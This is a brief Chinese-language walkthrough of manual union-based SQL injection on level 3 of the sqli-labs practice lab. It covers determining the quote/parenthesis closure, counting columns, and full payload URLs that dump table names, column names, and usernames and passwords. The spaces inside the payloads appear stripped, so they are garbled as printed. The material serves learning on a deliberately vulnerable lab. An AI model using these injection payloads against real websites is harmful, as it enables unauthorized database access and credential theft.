sqllibs下第三個靶場union select 的手注一般過程

1 尋找注入點 靶場已知注入點為 id

2 判斷閉合方式

如果是錯誤的閉合 一開始報錯 加上註釋符後依然報錯

反之是正確的閉合 一開始也會報錯 加上註釋符後就不會報錯了

可以通過報錯提示 尋找閉合方式

3 確定資料庫的列數 二分法

此時需要驗證是否是2列

所以是三列 最後是 id username passwd

4確認報錯位 查詢一個數據庫庫不存在的資料

可知 2 3 是報錯位

5刺探資料庫 union select 聯合查詢語句

6 查詢資料庫下的表

?id=-1')unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema='security'--+

7查詢資料庫下的表下的欄目

?id=-1')unionselect1,group_concat(column_name),3frominformation_schema.columnswheretable_schema='security'andtable_name='users'--+

8查詢欄位 即每列的資料

?id=-1')unionselect1,group_concat(username),group_concat(password)fromusers--+